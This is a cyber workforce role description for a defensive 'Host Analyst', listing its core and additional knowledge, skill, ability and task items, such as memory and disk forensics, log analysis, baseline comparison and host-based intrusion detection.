Host Analyst

Work Role ID: 463  |  Workforce Element: Cyberspace Effects

What does this role do? A Host Analyst (HA) will have knowledge of various system configurations encountered. This work role also performs analysis using built-in tools and capabilities. A Host Analyst will have knowledge of system services and the security and configuration of them, as well as knowledge of file systems, permissions, and operation system configurations. The Host Analyst conducts analysis using built-in tools and capabilities.

CORE KSATs

KSAT ID Description KSAT
22 * Knowledge of computer networking concepts and protocols, and network security methodologies. Knowledge
108 * Knowledge of risk management processes (e.g., methods for assessing and mitigating risk). Knowledge
1157 * Knowledge of national and international laws, regulations, policies, and ethics as they relate to cybersecurity. Knowledge
1158 * Knowledge of cybersecurity principles. Knowledge
1159 * Knowledge of cyber threats and vulnerabilities. Knowledge
6900 * Knowledge of specific operational impacts of cybersecurity lapses. Knowledge
6935 * Knowledge of cloud computing service models Software as a Service (SaaS), Infrastructure as a Service (IaaS), and Platform as a Service (PaaS). Knowledge
6938 * Knowledge of cloud computing deployment models in private, public, and hybrid environment and the difference between on-premises and off-premises environments. Knowledge

ADDITIONAL KSATs

KSAT ID Description KSAT
4171 Ability to analyze a finding of a compromise and develop a custom signature(s) and/or rule(s) to identify it throughout the network Ability
4172 Ability to analyze adversarial avenues of approach on a mission-critical system Ability
4174 Ability to analyze Data at Rest and Data in Transit encryption methodologies and assess Data at Rest and Data in Transit policies in support of identifying outliers to delineate possible avenues of approach. Ability
4176 Ability to analyze how the tools operate to enumerate the system Ability
4179 Ability to analyze multiple memory captures, determine anomalous behavior and developed a detailed report that includes timeline of compromise Ability
4182 Ability to analyze organizational policies and documentation for appropriate use and user privileges to determine current user access rights policies Ability
4184 Ability to analyze potentially malicious processes, libraries and modules on a system Ability
4185 Ability to analyze process lists within Windows, Unix, or Linux operating systems Ability
4186 Ability to analyze software installed and in use on a system, and on a host machine and compare it to the authorized software list provided by the network owner Ability
4187 Ability to analyze tools/hardware used to extract/analyze/capture memory and disk images Ability
4188 Ability to analyze user-mode/kernel mode rootkits and how they function and differ Ability
4189 Ability to analyze vulnerabilities and misconfiguration without Information Assurance artifacts. Ability
4195 Ability to build a baseline of configuration/state for host machines Ability
4197 Ability to capture a memory image from a host workstation Ability
4198 Ability to capture forensically sound memory and disk images with regard to timeline analysis Ability
4206 Ability to compare active user accounts on a network to appropriate Standard Operating Procedure (SOP), gather active user accounts on a network and compare to authorized user list Ability
4207 Ability to compare current state against baselines Ability
4209 Ability to compile group policies and access control lists from mission partner networks. Ability
4210 Ability to compile host-based firewall configurations and host intrusion prevention system through group policy modifications Ability
4211 Ability to conduct disk forensics on multiple images Ability
4216 Ability to configure log aggregation Ability
4217 Ability to configure, forward and statistically analyze logs Ability
4225 Ability to correlate indicators of compromise Ability
4232 Ability to de-obfuscate (e.g. command line execution, string substitution, clandestine side channel, Base64). Ability
4234 Ability to develop a risk defense plan (e.g. behavioral development, etc.) and put active measures in place in defense of a network, endpoint, and/or host. Ability
4237 Ability to develop dashboards to better visualize data Ability
4238 Ability to develop host-based IDS/IPS signatures and settings Ability
4239 Ability to develop the reporting and recording of discovered potentially malicious processes, libraries, and modules on a compromised system Ability
4245 Ability to enumerate domain security groups. Ability
4246 Ability to enumerate knowledge management applications (e.g. SharePoint) and their service accounts/security groups. Ability
4247 Ability to enumerate network shares and identify ACLs/security permissions and analyze for vulnerabilities/misconfigurations (e.g. SMB, NFS, ISCSI). Ability
4250 Ability to evaluate common Tactics, Techniques and Procedures (TTP) used in malware and open-source and Intelligence Community (IC) resources available to identify emerging TTPs Ability
4251 Ability to evaluate compliance with Security Technical Implementation Guides (STIGs) on host machines by utilizing a compliance scanner in support of identifying outliers in order to delineate possible avenues of approach Ability
4252 Ability to evaluate if patches are up to date for all hosts, determine current process for updating patches and determine current patch level for all hosts on a network according to NIST Special Publications 800-40 in support of identifying outliers in order to delineate possible avenues of approach. Ability
4256 Ability to evaluate rogue/unauthorized systems on a network Ability
4257 Ability to evaluate security posture shortcomings in group policy Ability
4258 Ability to evaluate steps taken after host-based IDS/IPS alerts, verify the finding and ensure its volatility Ability
4259 Ability to evaluate systems resiliency in adverse conditions Ability
4262 Ability to export/enumerate information (e.g., users, groups) from a Domain Controller. Ability
4266 Ability to identify activity context in log entries to correlate indicators of compromise. Ability
4269 Ability to identify anomalous network traffic on a host machine. Ability
4273 Ability to identify critical infrastructure systems with information communication technology that were designed without system security considerations. Ability
4281 Ability to identify new indicators of compromise through anomalous behavior in log entries. Ability
4283 Ability to identify security posture shortcomings Ability
4284 Ability to identify tools and techniques available for analyzing binary applications and interpreted scripts. Ability
4287 Ability to identify/select the most appropriate tools and solutions for the specific environment (e.g. disk/memory forensics/capture, host enumeration, application whitelisting, log aggregation and analysis, HIPS/HIDS solutions, etc.). Ability
4288 Ability to implement and configure host-based firewalls and host intrusion prevention systems Ability
4289 Ability to implement Data at Rest and Data in Transit encryption methodologies, Assess Data at Rest and Data in Transit polices. Ability
4302 Ability to measure known vulnerabilities against known vectors of approach. Ability
4306 Ability to monitor Active Directory (AD) for creation of unauthorized/potentially malicious accounts. Ability
4309 Ability to operate specified tools to enumerate a system. Ability
4312 Ability to organize Active Directories (AD) hierarchy structure. Ability
4313 Ability to organize logging and auditing procedures including server-based logging. Ability
4315 Ability to organize order of the volatility when capturing artifacts. Ability
4318 Ability to perform and analyze situational awareness commands within Windows, Unix, and Linux operating systems (e.g. system info, net stat, ipconfig, task list, ls, ifconfig, etc…) Ability
4319 Ability to perform and analyze vulnerability scans on host machines in support of identifying outliers in order to delineate possible avenues of approach. Ability
4320 Ability to perform complex root-cause analysis and recommend mitigations to determine root cause of an intrusion. Ability
4323 Ability to perform dynamic analysis. Ability
4326 Ability to perform static analysis. Ability
4331 Ability to prioritize how Operating System (OS) and application patches are distributed in different systems. Ability
4332 Ability to prioritize Operating Systems (OS) default processes, library, and modules based on boot order, dependencies, or key operations. Ability
4337 Ability to provide host analysis for Risk Mitigation Plan (RMP) to improve customer security overall posture. Ability
4339 Ability to provide mitigations to recover from a full network compromise. Ability
4351 Ability to select the best tools to enumerate a given set of host machines in order to validate whether they match known baselines. Ability
4363 Ability to use and integrate a Security Information and Event Management (SIEM) platform. Ability
4371 Ability to use host volatile data to compare active processes, libraries and modules against databases of known good/bad. Ability
4375 Ability to utilize Defense Information Systems Agency (DISA)/ Department of Defense (DoD) system configuration guidelines. Ability
4390 Knowledge of active directory federated services. Knowledge
4413 Knowledge of common information network malware (e.g., viruses, trojans, etc.) and vectors of attack (e.g., ports, attachments, etc.). Knowledge
4415 Knowledge of common obfuscation techniques (e.g. command line execution, string substitution, clandestine side channel, Base64). Knowledge
4416 Knowledge of common persistence locations within Windows, Unix, or Linux operating systems. Knowledge
4427 Knowledge of cybersecurity and cybersecurity-enabled software products. Knowledge
4429 Knowledge of cybersecurity controls and design principles and methods (e.g., firewalls, DMZ, and encryption). Knowledge
4430 Knowledge of cybersecurity Risk Management Framework (RMF) process. Knowledge
4434 Knowledge of DCO capabilities, including open-source tools, and their capabilities. Knowledge
4435 Knowledge of Defense-In-Depth principles. Knowledge
4438 Knowledge of different types of log subscriptions (e.g. push vs pull, MS Windows event forwarding, winlogbeat, syslog). Knowledge
4443 Knowledge of evasion strategies and TTPs (e.g., noise, stealth, situational awareness, bandwidth throttling). Knowledge
4445 Knowledge of existing cybersecurity principles, policies, and procedures Knowledge
4452 Knowledge of full-spectrum of cyberspace operations in an intelligence-driven DCO environment. Knowledge
4501 Knowledge of non-Active Directory domains (e.g. IDM, LDAP). Knowledge
4522 Knowledge of public key infrastructure (PKI) libraries, certificate authorities, certificate management, and encryption functionalities. Knowledge
4537 Knowledge of stream providers (e.g. KAFKA). Knowledge
4539 Knowledge of structured response frameworks (e.g. MITRE ATT&CK, Lockheed Martin Kill Chain, Diamond Model). Knowledge
4583 Knowledge of the U.S. Security System authorities, responsibilities, and contributions to the cyberspace operations mission. Knowledge
4585 Knowledge of the Windows registry hive keys and the information contained within each one. Knowledge
4589 Knowledge of typical system processes within Windows, Unix, or Linux operating systems Knowledge
4595 Knowledge of web applications and their common attack vectors. Knowledge
4599 Skill in analyzing endpoint collection data. Skill
4655 Skill in providing support to intelligence analysts to understand the operational environment and how it ties to intelligence reporting. Skill
4660 Skill in refining research (e.g., vulnerabilities, TTPs) to assist intelligence analysts’ preparation of products. Skill
4665 Skill in run level configurations in a Linux or UNIX environment Skill
4679 Skill in using various online tools for open-source research (e.g., online trade, DNS, mail, etc.). Skill
8036 Conduct open source research via various online tools. Task
8041 Confer with systems analysts, engineers, programmers, and others to design application and to obtain information on project limitations and capabilities, performance requirements, and interfaces. Task
8111 Identify potential points of strength and vulnerability among segments of a network map. Task
8115 Identify tools/hardware used to extract/analyze/capture memory and disk images. Task
8151 Perform security reviews and identify gaps in security architecture that can be used in the development of a security risk management plan. Task
8161 Provide and maintain documentation for TTPs as inputs to training programs. Task
8212 Validate intrusion detection system (IDS) alerts. Task